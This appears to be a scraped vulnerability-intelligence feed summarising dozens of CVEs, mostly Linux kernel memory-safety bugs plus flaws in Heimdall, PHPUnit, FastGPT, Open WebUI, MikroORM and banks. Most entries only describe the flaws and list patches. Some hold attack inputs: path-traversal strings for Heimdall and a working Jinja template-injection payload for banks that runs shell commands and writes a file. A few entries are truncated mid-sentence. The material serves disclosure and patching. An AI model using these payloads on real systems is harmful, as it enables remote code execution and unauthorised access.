Apache CloudStack's MinIO integration fails to clean up bucket access policies when buckets are deleted, enabling previous bucket owners to retain unauthorized access via cached credentials. If another user creates a bucket with the same name, the former owner gains read/write access using their old access keys. CISA has not listed this CVE in KEV, indicating no confirmed widespread exploitation. CVSS 8.0 reflects high impact but requires authenticated access and user interaction (PR:L/UI:R), tempering immediate urgency. Patch available in CloudStack 4.20.3.0 and 4.22.0.1.
Authorization bypass in Heimdall cloud-native Identity Aware Proxy allows remote unauthenticated attackers to circumvent access control policies via path normalization mismatches. Attackers can craft requests with encoded or relative path traversal sequences (e.g., /public/../admin, /user/%2e%2e/admin) that Heimdall evaluates against one rule while downstream services normalize to a different protected path, enabling unauthorized access to restricted resources or functionality. No public exploit identified at time of analysis, though CVSS vector indicates network-accessible, low-complexity exploitation (CVSS:4.0 AV:N/AC:L/PR:N). Fixed in version 0.17.14.
Heimdall's case-sensitive host matching bypasses access control policies when attackers submit HTTP requests with alternate letter casing in the Host header, exploiting the discrepancy between HTTP spec (case-insensitive hostnames) and Heimdall's implementation. Versions prior to 0.17.14 fail to match rules configured for lowercase hostnames when requests arrive with mixed or uppercase casing, potentially routing to permissive default rules and granting unintended access. This vulnerability is most dangerous when Heimdall is deployed with insecure default rule enforcement flags enabled, though it requires attackers to know the exact hostname pattern and exploit misconfiguration.
Authorization bypass in Heimdall cloud-native Identity Aware Proxy affects versions prior to 0.17.14 due to case-sensitive URL-encoded slash handling. Remote unauthenticated attackers can craft requests with lowercase-encoded slashes (%2f) to evade path-based access controls when 'allow_encoded_slashes' is disabled (default). This discrepancy between Heimdall's path interpretation and upstream services enables access to restricted endpoints if a permissive default rule exists. GitHub reports a public fix (PR #3207, commit 8b0de6a) with patched version 0.17.14 released. No public exploit identified at time of analysis. CVSS 7.8 with CVSS:4.0 vector indicates network-accessible, low-complexity attack requiring no privileges or user interaction, though real-world impact depends on deployment configuration.
Stack buffer overflow in the Linux kernel's pmbus/q54sj108a2 hwmon driver allows local privileged users to corrupt kernel stack memory by reading from a specific debugfs entry. The flaw stems from a misuse of bin2hex() that writes 64 bytes of hex-encoded output into a 34-byte stack buffer, overflowing it by 30 bytes; no public exploit identified at time of analysis and EPSS exploitation probability is negligible at 0.03% (9th percentile).
Local privilege escalation in the Linux kernel's CAIF serial driver allows attackers with local access to trigger a use-after-free condition in pty_write_room() via the caif_serial line discipline. The flaw stems from missing reference counting on tty->link, enabling memory corruption that can lead to arbitrary kernel code execution with full confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, with an EPSS score of 0.02% (7th percentile) indicating low likelihood of widespread exploitation.
Use-after-free in Linux kernel ALSA PCM subsystem allows local authenticated users to corrupt memory and potentially execute arbitrary code with kernel privileges. The vulnerability occurs in snd_pcm_drain() when a linked stream's runtime structure is freed via concurrent close() while still being dereferenced, enabling information disclosure, system crashes, or privilege escalation. With EPSS at 0.02% (7th percentile) and CVSS 7.8, this represents elevated theoretical risk but shows no evidence of active exploitation or public POC at time of analysis. Vendor patches are available across multiple stable kernel branches (5.10.253, 6.1.167, 6.6.130, 6.12.78, 6.18.19, 6.19.9, 7.0).
Use-after-free in the Linux kernel's Renesas USB host (renesas_usbhs) driver allows a local low-privileged attacker to potentially corrupt memory or escalate privileges during device removal. The flaw stems from the interrupt handler remaining registered while driver resources, including the pipe array, are freed in usbhs_remove(), creating a race window where the ISR can dereference freed memory. EPSS is very low (0.02%, 7th percentile) and no public exploit identified at time of analysis, but the kernel-level memory corruption impact (CVSS 7.8) makes it a meaningful local risk on affected Renesas USB hardware.
Use-after-free race condition in Linux kernel amdgpu driver allows local authenticated users to achieve arbitrary code execution with high confidentiality, integrity, and availability impact. The flaw occurs when parent and child processes sharing a drm_file both attempt to acquire the same virtual memory context after fork(), due to non-atomic vm->process_info assignment. Patches released across multiple stable kernel versions (5.10.253, 5.15.203, 6.1.167, 6.6.130, 6.12.78, 6.18.19, 6.19.9, 7.0). EPSS score of 0.02% (7th percentile) indicates very low predicted exploitation probability despite CVSS 7.8 severity, and no active exploitation or public POC identified.
Local privilege escalation in Linux kernel io_uring subsystem allows authenticated attackers with low privileges to achieve high confidentiality, integrity, and availability impact through improper buffer list type validation during recycling operations. The vulnerability stems from a race condition where buffer lists can be upgraded from legacy to ring-provided type between acquisition and recycling when requests are forced through io-wq, potentially leading to type confusion and memory corruption. Patches available across multiple kernel versions (6.1.167, 6.6.130, 6.12.78, 6.18.19, 6.19.9, 7.0) with upstream commits confirmed. EPSS score is very low (0.02%, 7th percentile) indicating minimal observed exploitation probability despite high CVSS 7.8 rating. No KEV listing or public exploit identified at time of analysis.
Local privilege escalation in Linux kernel IPv6 address configuration subsystem enables authenticated local users to gain high-level system access through a use-after-free (UaF) condition in addrconf_permanent_addr(). Patch available across all maintained stable kernel series (5.10.253, 5.15.203, 6.1.168, 6.6.134, 6.12.81, 6.18.22, 6.19.12, 7.0) with fixes backported from commit f1705ec197e7. EPSS score of 0.02% suggests minimal active exploitation likelihood, no KEV listing or public POC identified at time of analysis.
Buffer overflow in Linux kernel netfilter flowtable hardware offload allows local authenticated users to achieve high confidentiality, integrity, and availability impact via IPv6 flowtable configurations. The vulnerability stems from an off-by-one error where IPv6 setups require 17 actions but the hardcoded limit was 16, enabling memory corruption when complex IPv6 flows with SNAT, DNAT, VLAN manipulation, and tunneling are offloaded to hardware. EPSS exploitation probability is low (0.02%, 7th percentile), and vendor patches are available across multiple stable kernel branches (5.15.203, 6.1.168, 6.6.134, 6.12.81, 6.18.22, 6.19.12, 7.0). No public exploit code or CISA KEV listing identified at time of analysis.
Double-free condition in the Linux kernel's cpufreq governor subsystem affects multiple stable branches and can lead to memory corruption when an error path in cpufreq_dbs_governor_init() is triggered. The flaw stems from redundant cleanup logic that calls gov->exit() and kfree(dbs_data) twice after a kobject_init_and_add() failure, and no public exploit identified at time of analysis. EPSS exploitation probability is very low (0.02%, 7th percentile), consistent with a local memory-safety bug requiring privileged access rather than a remote attack surface.
Race condition in the Linux kernel's dummy-hcd USB driver allows local authenticated users to trigger use-after-free conditions during gadget driver unbinding, potentially enabling privilege escalation, information disclosure, or denial of service. The flaw stems from incorrect ordering of interrupt synchronization - emulated synchronize_irq() runs before interrupt-disable, allowing callbacks to execute after the gadget driver is unbound. Patched versions include 5.15.203, 6.1.168, 6.6.134, 6.12.81, 6.18.22, 6.19.12, and mainline 7.0. EPSS score of 0.02% (7th percentile) indicates very low probability of exploitation in the wild, with no confirmed active exploitation or public POC identified at time of analysis.
Command injection in electerm's SFTP file editor feature allows arbitrary code execution when users edit files with maliciously crafted filenames. The vulnerability affects versions prior to 3.7.9 and can be exploited by attackers controlling SSH servers or the victim's operating system to inject shell metacharacters into filenames. When victims attempt to edit these files using 'open with system editor' or custom editor features, unsanitized filenames are passed directly to command execution functions, triggering injected commands with user privileges. GitHub security advisory GHSA-q4p8-8j9m-8hxj confirms the vulnerability, with exploit code demonstrable through the proof-of-concept filename in unit tests. EPSS data not available, not listed in CISA KEV. Vendor-released patch available in version 3.7.9.
Type confusion in the Linux kernel bonding driver allows local authenticated users to trigger kernel crashes and potentially escalate privileges when non-Ethernet devices (such as GRE tunnels) are enslaved to a bond interface. The vulnerability stems from bond_setup_by_slave() blindly copying header_ops from slave devices without accounting for device-specific private data structures, causing netdev_priv() in functions like ipgre_header() to access incorrect memory layouts. Vendor patches are available for kernel versions 6.12.78, 6.18.19, 6.19.9, and 7.0. EPSS exploitation probability is low (0.02%, 5th percentile) with no public exploit identified at time of analysis.
Reference count underflow in Linux kernel sched_ext subsystem enables local privilege escalation to execute arbitrary code with kernel privileges. The flaw affects kernel versions 6.12 through 6.19.x (prior to patched releases 6.12.78, 6.18.19, 6.19.9, 7.0), scoring CVSS 7.8 with local attack vector requiring low privileges. Vendor patches available via stable kernel updates. EPSS exploitation probability is low (0.02%, 5th percentile) with no public exploit code or active exploitation confirmed at time of analysis, though the Use-After-Free primitive could enable kernel memory corruption attacks.
Memory corruption in the Linux kernel's Ceph filesystem client allows local authenticated users to trigger kernel crashes and potentially escalate privileges. The vulnerability stems from missing zero-initialization of ceph_path_info structures before passing them to ceph_mdsc_build_path(), causing subsequent ceph_mdsc_free_path_info() calls to attempt freeing uninitialized or corrupted memory pointers. Multiple code paths in ceph_open() and related functions are affected, introduced by commit 15f519e9f883. Patches are available for kernel versions 6.12.78, 6.18.19, 6.19.9, and 7.0. EPSS score of 0.02% (5th percentile) indicates low probability of widespread exploitation, with no public exploit code or CISA KEV listing at time of analysis.
Use-after-free in Linux kernel nexthop routing code allows local authenticated attackers with low privileges to execute arbitrary code, escalate privileges, or crash the system. The vulnerability occurs when removing a nexthop from a routing group, where percpu statistics memory is freed before the RCU grace period completes, allowing concurrent readers to access freed memory. Vendor patches available for stable kernel branches 6.12.78, 6.18.19, 6.19.9, and mainline 7.0. EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and no active exploitation is confirmed (not in CISA KEV). CVSS 7.8 reflects local attack vector requiring authenticated access.
Integer overflow in Linux kernel's i915 graphics driver corrupts memory mapping for DRM/GEM shmem objects larger than 4GB, causing kernel warnings, potential crashes, and incorrect memory access when Intel graphics hardware processes large buffer objects. The vulnerability manifests when scatterlist length fields overflow during folio page allocation, leading to premature termination of backing page iteration. Patch available across multiple stable kernel branches (6.6.130, 6.12.78, 6.18.19, 6.19.9, 7.0) per upstream commits. EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis.
Use-after-free in Linux kernel thermal subsystem allows local authenticated attackers with low privileges to achieve high confidentiality, integrity, and availability impact through race condition during thermal zone device registration failure. The flaw occurs when thermal_zone_device_register_with_trips() fails after registration but before properly cleaning up - if userspace holds a kobject reference, the thermal zone structure can be freed prematurely while still in use. Vendor patches available across stable branches (6.6.134, 6.12.81, 6.18.22, 6.19.12, 7.0). EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability despite CVSS 7.8 rating, suggesting limited real-world attacker interest in this local race condition.
Buffer overflow in the Linux kernel's CAAM crypto driver allows local authenticated attackers to corrupt memory and potentially execute arbitrary code with elevated privileges. The vulnerability occurs when HMAC keys exceeding the algorithm's block size are processed - the driver allocates DMA-aligned memory but uses kmemdup() to copy only the actual key length, then reads beyond the source buffer boundary during hashing. EPSS score of 0.02% (5th percentile) indicates low predicted exploitation likelihood. Patches are available across multiple stable kernel branches (6.6.134, 6.12.81, 6.18.22, 6.19.12, 7.0) via upstream commits, with fixes applied since kernel 6.3 introduced the vulnerable code.
Improper register liveness tracking in the Linux kernel eBPF verifier allows local authenticated users to potentially achieve information disclosure, privilege escalation, or denial of service through crafted BPF programs. The vulnerability stems from the compute_insn_live_regs() function failing to mark registers as used during indirect jump ('gotox rX') instructions, enabling attackers with BPF program loading privileges to manipulate register state tracking. With EPSS exploitation probability at 0.02% (5th percentile) and no evidence of active exploitation or public POC, this represents a theoretical risk primarily for systems where unprivileged users can load BPF programs. Vendor patches are available for kernel versions 6.18.16, 6.19.6, and 7.0.
Buffer over-read in the Linux kernel's adxl380 IIO accelerometer driver allows local authenticated users to read arbitrary kernel memory. The FIFO interrupt handler incorrectly calculates batch sizes when multiple channels are enabled, reading more entries than exist in the FIFO buffer. CVSS rates this 7.8 (High) with local access requiring low-privileged credentials. EPSS exploitation probability is minimal (0.02%, 5th percentile), indicating low real-world risk. Patches available in stable kernel versions 6.12.75, 6.18.16, 6.19.6, and 7.0.
Memory corruption in Linux kernel's Amlogic SPI Flash Controller A4 driver allows local authenticated attackers with low privileges to escalate privileges, corrupt memory, or cause denial of service through improper DMA mapping error handling. The vulnerability stems from three distinct bugs in aml_sfc_dma_buffer_setup() that can trigger double-unmapping and incorrect DMA synchronization. EPSS score of 0.02% (4th percentile) indicates low exploitation likelihood in the wild. Vendor patches are available for affected kernel versions 6.18.x and 6.19.x, with fixes backported to stable branches.
Local privilege escalation potential in the Linux kernel's Rockchip Serial Flash Controller (SFC) SPI driver arises from a double-free in the remove() callback path, where the driver calls spi_unregister_controller() manually despite already using the devm-managed registration helper. The flaw affects systems using the rockchip-sfc driver and is not currently in CISA KEV, with no public exploit identified at time of analysis and a very low EPSS score (0.02%, 4th percentile), but CVSS 7.8 reflects high local impact if triggered.
Privilege escalation in Linux kernel netfilter subsystem allows local authenticated users to achieve high-impact compromise via duplicate netdev hook registration. The vulnerability affects kernel versions 6.16 through early 7.0 releases, with vendor patches available for stable branches 6.18.19, 6.19.9, and mainline 7.0. EPSS score of 0.02% (4th percentile) suggests low observed exploitation likelihood despite CVSS 7.8 severity. No active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis.
Use-after-free in the Linux kernel iavf driver allows local authenticated users to execute arbitrary code, escalate privileges, or crash the system. The vulnerability affects Intel Ethernet Adaptive Virtual Function (iavf) driver's PTP implementation where a worker thread continues accessing freed memory during network adapter reset or disable operations. Patch available from kernel.org upstream commits across multiple stable branches (6.18.19, 6.19.9, 7.0+). EPSS score of 0.02% (4th percentile) indicates low observed exploitation likelihood, and no CISA KEV listing confirms this remains a theoretical risk requiring local access with low privileges.
Local privilege escalation potential in the Linux kernel's Microsoft Azure Network Adapter (mana) driver allows a low-privileged local user to trigger a use-after-free via a double destroy_workqueue() call on the gc->service_wq pointer when mana_gd_setup() fails. The flaw, fixed in the 6.18.x and 6.19.x stable trees, has no public exploit identified at time of analysis and an EPSS of 0.02% (4th percentile), but carries a CVSS of 7.8 due to high confidentiality, integrity, and availability impact within the kernel.
Local privilege escalation in Linux kernel's Rust Binder allows authenticated users to write to normally read-only binder pages, potentially leading to memory corruption and arbitrary code execution. The vulnerability stems from improper VMA (Virtual Memory Area) ownership validation during page installation - if a VMA is closed and replaced at the same address, Rust Binder may install pages into the wrong VMA, converting read-only pages to writable. Affects Linux kernel 6.18+ with Rust Binder enabled. EPSS score of 0.02% suggests low observed exploitation probability. Vendor patches available (6.18.19, 6.19.9, 7.0) via kernel.org stable tree commits.
Time-of-check-to-time-of-use (TOCTOU) race condition in Linux kernel's rust_binder implementation allows local authenticated attackers with low privileges to escalate privileges. The flaw exists in transaction offset array handling where values copied to a target process's read-only VMA are read back without protection against concurrent modification. If an attacker can write to their own supposedly read-only VMA through a separate vulnerability, they can modify offsets between write and read operations, causing the kernel to misinterpret transaction data and potentially enabling privilege escalation into the sending process. Patch available in kernel versions 6.18.19, 6.19.9, and 7.0. EPSS score of 0.02% suggests limited real-world exploitation likelihood despite CVSS 7.8 severity.
Use-after-free condition in the Linux kernel's DAMON (Data Access MONitor) subsystem affects systems running kernel version 6.14 and related stable branches prior to the patched commits. A local low-privileged user can trigger a dangling pointer to a stack-allocated walk_control structure when damos_walk() is invoked against an inactive DAMON context, with no public exploit identified at time of analysis and an EPSS probability of just 0.02%.
Race condition in Linux kernel I3C HCI DMA dequeue handler allows local authenticated attackers with low privileges to trigger memory corruption leading to privilege escalation, denial of service, or information disclosure. The vulnerability affects kernel versions from 5.11 onwards where the mipi-i3c-hci driver is enabled. EPSS probability is low (0.02%, 4th percentile) and no active exploitation or public POC is identified at time of analysis. Vendor patches available for stable kernel branches 6.18.19, 6.19.9, and 7.0.
Flawed DMA ring abort handling in the Linux kernel's MIPI I3C Host Controller Interface driver allows local authenticated attackers with low privileges to cause high-severity impacts including information disclosure, integrity violations, and denial of service. The vulnerability stems from improper abort sequence logic that disrupts controller state by unintentionally clearing hardware enable bits and resetting ring pointers. Vendor patches are available for kernel versions 6.18.19, 6.19.9, and 7.0. EPSS score of 0.02% (4th percentile) indicates low probability of mass exploitation, and no active exploitation or public POC has been identified at time of analysis.
Use-after-free in Linux kernel swap subsystem allows local authenticated users to achieve high-severity code execution, integrity violations, or denial of service. The vulnerability stems from multiple kernel subsystems (SLUB, shmem, TTM) failing to clear page->private fields before freeing memory, causing stale pointers to persist when pages are reallocated and split. The swap code then dereferences these uninitialized LIST_POISON values during swapoff operations, triggering KASAN-detected wild memory access. Patches available across kernel versions 6.18.16, 6.19.6, and 7.0, with EPSS score of 0.02% indicating low observed exploitation probability despite CVSS 7.8 rating.
A buffer management flaw in the Linux kernel's uvcvideo (USB Video Class) driver allows local authenticated attackers to trigger memory corruption via improper buffer handling when streaming initialization fails. The vulnerability manifests when xHCI controller failures cause uvc_pm_get() errors during start_streaming(), leaving queued video buffers unreturned and potentially causing system instability or privilege escalation. Patches are available from kernel maintainers for versions 6.18.16, 6.19.6, and 7.0+, with upstream fixes committed. EPSS score of 0.02% suggests minimal observed exploitation attempts, and no KEV listing indicates this is not currently exploited in the wild despite the high CVSS 7.8 score.
Local attackers with standard user credentials can escalate privileges to NT AUTHORITY\SYSTEM in NAVER MYBOX Explorer for Windows through registry manipulation. The vulnerability affects versions prior to 3.0.11.160 and stems from improper privilege checks, allowing complete system control on compromised endpoints. EPSS risk is low at 0.02% (4th percentile), indicating minimal observed exploitation probability. No active exploitation has been reported and this vulnerability is not listed in CISA KEV.
Arbitrary PHP directive injection in PHPUnit 12.5.21 and 13.1.5 enables local attackers with write access to phpunit.xml to achieve code execution in isolated test child processes by embedding newlines in INI setting values. The vulnerability exploits PHPUnit's unsanitized forwarding of INI settings to child processes via command-line arguments, where PHP's INI parser treats newlines as directive separators, allowing injection of auto_prepend_file to load attacker-controlled code. Fixed in versions 12.5.22 and 13.1.6. Primary exposure vector is Poisoned Pipeline Execution (PPE) in CI/CD environments running PHPUnit against untrusted pull requests without isolation.
Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/04/28. dvisory 484 v2 (CVE-2026-23557) - Xenstored DoS via XS_RESET_WATCHES command (Xen.org security team <security@....org>) Xen Security Advisory 485 v2 (CVE-2026-31786) - Linux kernel out of bounds read via Xen-related sysfs file (Xen.org security team <security@....org>) Xen Security Advisory 486 v2 (CVE-2026-23558) - grant table v2 race in status page mapping (Xen.org security team <security@....org>) Xen Security Advisory 487 v2 (CVE-2026-31787) - Linux kernel double free in Xen privcmd driver (Xen.org security team <security@....org>) Coordinated Disclosure in the LLM Age (Jeremy Stanley <fungi@...goth.org
FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches.
Authenticated users can bypass model access controls in Open WebUI ≤0.8.12 to invoke restricted AI models via chained base_model_id references. Any user with default model creation permissions can create a wrapper model referencing a restricted base model (e.g., gpt-4-turbo with admin-only access), then query it to consume the admin's API credits and access premium model capabilities. This vulnerability enables cost escalation on pay-per-token backends (OpenAI, Anthropic, Azure) and defeats tiered access policies. GitHub advisory confirmed; patched in version 0.9.0. No active exploitation confirmed per available intelligence, but the attack path is straightforward for authenticated users with standard permissions.
Out-of-bounds read in Linux kernel SMB client allows malicious SMB servers to disclose kernel memory and potentially crash systems via crafted NFS mode SIDs in ACL responses. Affects Linux kernel 5.4+ with SMB client enabled. Vendor patches released for stable branches 6.6.136, 6.12.84, 6.18.25, 7.0.2, and mainline 7.1-rc1. EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and no active exploitation confirmed (not in CISA KEV). Attack requires user interaction (mounting malicious SMB share), reducing practical risk for environments with controlled server connections.
SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.
yeti-platform yeti before 2.1.12 allows attackers to generate valid JWT tokens is the secret is not changed (by setting YETI_AUTH_SECRET_KEY to a value other than SECRET). Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.
LDAP Filter Injection in Zitadel's identity provider implementation allows unauthenticated remote attackers to enumerate valid usernames and extract sensitive LDAP directory attributes through blind injection techniques. The vulnerability exists in Zitadel versions 2.71.11-2.71.19, 3.1.0-3.4.9, and 4.0.0-4.14.0 when LDAP is configured as an identity provider. Exploitation requires no authentication (CVSS PR:N) and has network attack vector (AV:N) with low complexity (AC:L), resulting in high confidentiality impact (C:H) but no authentication bypass capability. Vendor-released patches are available for 3.x (3.4.10) and 4.x (4.15.0) branches. No public exploit identified at time of analysis, though the attack technique is well-documented in security research.
### Impact Any application using that loads untrusted ASN1 files (eg. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Uncontrolled Resource Consumption vulnerability could allow attackers to cause denial of service by exhausting system resources.
## Summary `banks <= 2.4.1` uses `jinja2.Environment()` (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to `Prompt()` are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This is a vulnerability in how `banks` initializes its Jinja2 environment - not in Jinja2 itself. ## Vulnerable Code `src/banks/env.py` - the global Jinja2 environment is created without sandboxing: ```python env = Environment( autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False), ... ) ``` ## Attack Scenario An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to `Prompt()` is vulnerable. For example: ```python # User-controlled input reaches Prompt() user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(user_input) p.text() # Executes arbitrary command on the host ``` ## Proof of Concept **Setup:** ```bash pip install banks==2.4.1 ``` **PoC script:** ```python from banks import Prompt payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(payload) result = p.text() print(f"[+] Output: {result}") ``` **Confirmed output:** ``` [+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),... text **File-write proof:** ```python from banks import Prompt p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}") p.text() ``` ```bash ls -l /tmp/rce_banks_exec # -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec ``` ## Impact Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise. ## Fix Fixed in `banks 2.4.2` (PR #74) by switching to `jinja2.sandbox.SandboxedEnvironment`, which blocks the dunder attribute traversal chain this exploit relies on. Developers on `banks <= 2.4.1` should upgrade to `2.4.2` and avoid passing untrusted user input as the template argument to `Prompt()`. ## Resources - Fix: https://github.com/masci/banks/pull/74 - CVE-2024-41950 (Haystack - identical root cause, CVSS 7.5) - CVE-2025-25362 (spacy-llm - identical root cause) - CWE-1336: Improper Neutralization of Special Elements in a Template Engine
Denial of service in lwjson 1.8.1 streaming parser allows remote unauthenticated attackers to cause indefinite application hang by sending JSON strings containing escaped backslashes followed by quotes (e.g., "text\\\"). The vulnerability stems from flawed end-of-string detection logic in lwjson_stream.c that fails to properly count consecutive backslashes before quote characters. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) and no authentication required, this represents a readily exploitable availability risk for applications using lwjson_stream_parse(), though no active exploitation or POC weaponization is confirmed at time of analysis.
Pre-authentication denial-of-service in russh SSH server library allows remote attackers to crash servers implementing keyboard-interactive authentication via a single malformed packet. Affects russh versions prior to 0.60.1. Attacker sends crafted SSH_MSG_USERAUTH_INFO_RESPONSE with inflated allocation count (e.g., 0x10000000), triggering multi-gigabyte memory allocation and OOM crash before any credential validation occurs. Vendor-released patch available (v0.60.1) bounds allocation to remaining packet data. Confirmed working exploit code exists per GitHub security advisory GHSA-f5v4-2wr6-hqmg. CVSS 7.5 (High) with network vector, low complexity, no privileges required.
Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This XML External Entity (XXE) vulnerability could allow attackers to read arbitrary files or perform SSRF through XML processing.